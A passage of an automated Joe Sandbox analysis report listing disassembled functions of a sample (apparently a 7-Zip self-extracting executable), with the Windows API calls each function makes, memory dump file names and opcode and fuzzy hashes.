??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: 1a4b74ded979b4ecf291815d3d982842584d21ec499bcc61b92b2ff60919d255
Instruction ID: d4d9177561ba86130c59ecf769237b2e762d53917a12275e761ebd000d06797d
Opcode Fuzzy Hash: 1a4b74ded979b4ecf291815d3d982842584d21ec499bcc61b92b2ff60919d255
Instruction Fuzzy Hash: 7AF08C36610611ABD338DF29C58186BB3E4EB88355720893FE28ACB2A1DA35A880C754

Function 0040250F Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 0040251F
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 00402543

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: bf0dca0c46d70b304b8d8584092d60bb7ff45e1102dc1ab57bd53102d0fae494
Instruction ID: ee6e1bd81e6d65453633442f6a1d57c69857676589945f0ce02378b43b8f31e2
Opcode Fuzzy Hash: bf0dca0c46d70b304b8d8584092d60bb7ff45e1102dc1ab57bd53102d0fae494
Instruction Fuzzy Hash: 0DF09035004652AFC3309F29D994843F7E4AF55705720887FE1DAC33A2C674A880C768

Function 0040C8F9 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040C914
GetLastError.KERNEL32(?,?,?,?), ref: 0040C922

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
Instruction ID: 5a685d8d3943d7b2e7289d0006b4b3d46cacc15a83080b067a3dad9829954c10
Opcode Fuzzy Hash: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
Instruction Fuzzy Hash: F7F0DAB5900208FFCB04CF94D9849EE7BB5EF49310B108669F915A73A0D7359E50DB64

Function 0040269A Relevance: 3.0, APIs: 2, Instructions: 10COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 9bdf8e72a7f15760b8fab15500d3dfc93a0e4d3910a8e03da63fda94412c67e1
Instruction ID: 6a7e44d1361fbcc4c06fb61f3001a61fff325a62d5d84498b6a11b5e2c7c739c
Opcode Fuzzy Hash: 9bdf8e72a7f15760b8fab15500d3dfc93a0e4d3910a8e03da63fda94412c67e1
Instruction Fuzzy Hash: BBB0923280C260AEBA3A3E15F9038C967D5EF1023A321856FF089112656E972D92668C

Function 0040DA22 Relevance: 2.5, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 0040DA2D
LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040DA4C

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
Instruction ID: 5d27eff888a04a2a1af920e5c8fe564bbb0a5ef9a93153a65d570a8b15afed72
Opcode Fuzzy Hash: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
Instruction Fuzzy Hash: ADF01D36600214EBCB119FD5DC08E9ABBA9FF99761F10442AFA41A7260C771E811DFA4

Function 00410329 Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041032E

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
Instruction ID: d622825666b969e0cf609659fb89c84123d12be518dfc819517b0c3290ecd380
Opcode Fuzzy Hash: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
Instruction Fuzzy Hash: 0421713160020ADFCB20EFA6D495AEE7775AF40308F14447EF816AB281DB78ED85CB55

Function 00401252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?), ref: 00401296

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
Instruction ID: 365df7105ab9a04826b78ec900b125106ca9408a1d9c2f09e43ac9e2ec372a14
Opcode Fuzzy Hash: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
Instruction Fuzzy Hash: 79F05E32504601EFC720AF69D840BA777F5FB88300F08482EE486F25B0D378B881CB59

Function 0040C95F Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040C88E: CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899

CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4), ref: 0040C981

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
Instruction ID: bfcfdadf78b221de7b75783111638f87db2d9d80aed60170162fb1aa82d728bf
Opcode Fuzzy Hash: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
Instruction Fuzzy Hash: 3BE08637000219BBCF115FA4EC41BCE3F55AF097A0F144626FA14A61F0D772C971AB99

Function 0040CAA0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040D0BE,00000001,00419858,00419858,0041549C,?,00405599,?,?), ref: 0040CAC3

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
Instruction ID: 88aaa84a90d32b64ed1f6dd0793a6e1d7fbd9e1969eb2b8b5a1cb2f912c455e2
Opcode Fuzzy Hash: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
Instruction Fuzzy Hash: 55E0C275640208FFDB01CF95C841BDE7BB9AB48354F10C169E9189A260D3799A50DF54

Function 00406E05 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_beginthreadex.MSVCRT ref: 00406E18

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: _beginthreadex
String ID:
API String ID: 3014514943-0
Opcode ID: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
Instruction ID: 033854197d412f734f15e9e19b3d909a116f00c1e253b1452bfc5409eef9a5ef
Opcode Fuzzy Hash: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
Instruction Fuzzy Hash: 97D017F6900208BFCF01EFA0CC45CEB3BADEB08204B004464B905C2110E671DA109BA0

Function 0040C9E5 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040C9FB

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
Instruction ID: 10957c0686827aba29bf6b3fca61d148a92be0f7cf9b29a220708a815fa9a989
Opcode Fuzzy Hash: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
Instruction Fuzzy Hash: 96E0EC75200208FFDB01CF90CD41FDE7BBEEB49754F208058E9049A160C7759A10EB54

Function 004127AA Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004127AF

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
Instruction ID: 86de7528c5b8e745b9feb2f1f2e8827419998e537f7b53f3733c02d1bff58703
Opcode Fuzzy Hash: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
Instruction Fuzzy Hash: 54D012B6A00108BBDB159F85E945BDEF778EB5135AF10402FB001A1540D7B85A519669

Function 0040CA73 Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNELBASE(?,?,?,?,0040CA9D,00000000,00000000,?,00401283,?), ref: 0040CA81

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: FileTime
String ID:
API String ID: 1425588814-0
Opcode ID: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
Instruction ID: de5aedd212665daa2fb0c30df7e581d57bf74256c4b77fd25e19f66411ac9bb8
Opcode Fuzzy Hash: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
Instruction Fuzzy Hash: 09C04C36158105FFCF020FB0CC04C5ABFA2AF99311F10C918B159C4070C7328024EB02

Function 0040CE83 Relevance: 1.3, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000060), ref: 0040CEFE

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
Instruction ID: cab80700ff2ef97e3e68849728e007b5961c94ff6a6edc9b3495ca6231c3d80c
Opcode Fuzzy Hash: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
Instruction Fuzzy Hash: 23214A32604246DBCB34AF61D8D086BB3A6AF403557244A3FE442776D1C738AC479BDA

Function 004032D9 Relevance: 1.3, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
Instruction ID: 04593239a52e0b24a0a84900efeb5de78bbbd7c33ac0e85a63675f9701e427e5
Opcode Fuzzy Hash: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
Instruction Fuzzy Hash: 92D0223230422029DA64393A0907AFF4C8C8F90361F00487FB804EA2C1ED7CCE81228D

Function 0040C88E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
Instruction ID: 46fd5d44533f688af1cbb16b01e3684df0873ba17e3ffd79ac6e97726efa63b3
Opcode Fuzzy Hash: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
Instruction Fuzzy Hash: 53D0123220456186DA782F7CB8C45C237D96E56331331476BF0B6D72E4D3788C835A98

Function 00402739 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040D8FF,?,?,?,004096BF,?), ref: 00402755

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
Instruction ID: ef3627dbe8ede4864a94ca482c41f1f7a661cdc9e7d225e9ae9e2bc502ca7986
Opcode Fuzzy Hash: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
Instruction Fuzzy Hash: D5C0803014430079ED1137608E07B4936526B80716F50C465F344540F0D7F544005509

Function 00401CFA Relevance: 1.3, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,0040D8A7,00000000,?,0040D8F6,?,?,004096BF,?), ref: 00401D0C

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
Instruction ID: 1004f56851fc8b889ccfe642d75eb19623be02efc3220bf612975ac128c53eb9
Opcode Fuzzy Hash: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
Instruction Fuzzy Hash: 7FB09230544700FEEF224B00DE09B8A76A0ABC0B05F30C528B188641F087B56804EA09

Non-executed Functions

Function 0040385E Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 290comCOMMON

Download Yara Rule

APIs

_wtol.MSVCRT ref: 00403882
SHGetSpecialFolderPathW.SHELL32(00000000,?,DF20E863,00000000,00419828,00000000,0041981C), ref: 00403925
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403996
??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 0040399E
??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 004039A6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 004039AE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 004039B6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 004039BE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 004039C6
_wtol.MSVCRT ref: 00403A1C
CoCreateInstance.OLE32(00416E70,00000000,00000001,00416E30,00405712,.lnk,?,0000005C), ref: 00403ABD
??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 00403B55
??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 00403B5D
??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 00403B65
??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 00403B6D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 00403B75
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 00403B7D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 00403B85
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 00403B8B
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 00403B93

Strings

.lnk, xrefs: 00403A9C

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
String ID: .lnk
API String ID: 408529070-24824748
Opcode ID: 1948e0700340f48ec15fd9fe2690368c0dd61efe9497a1a1bad70624b13cca41
Instruction ID: 6a4e2cb34307125d1aa254537a73282d765d300cba51a9a08192486ca10ed339
Opcode Fuzzy Hash: 1948e0700340f48ec15fd9fe2690368c0dd61efe9497a1a1bad70624b13cca41
Instruction Fuzzy Hash: 4DA18E71D10249ABDF14EFA1CC469EEBB78FF1430AF50442AF406B71A1DB389A42DB18

Function 00402187 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150stringCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
wsprintfW.USER32 ref: 004021E7
GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
GetLastError.KERNEL32 ref: 00402201
??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
GetLastError.KERNEL32 ref: 00402236
lstrcmpiW.KERNEL32(00AA9848,00404926), ref: 0040224B
??3@YAXPAX@Z.MSVCRT(00AA9848), ref: 0040225B
??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
SetLastError.KERNEL32(?), ref: 00402282
lstrlenA.KERNEL32(00416208), ref: 004022B6
??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
_wtol.MSVCRT ref: 00402314
MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,00AA9848,00000002), ref: 00402334

Strings

7zSfxString%d, xrefs: 004021E1

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
String ID: 7zSfxString%d
API String ID: 2117570002-3906403175
Opcode ID: eb80ecc119c928046d4f48b44d1c37ea9d549868a3ac961d5216fb6842945394
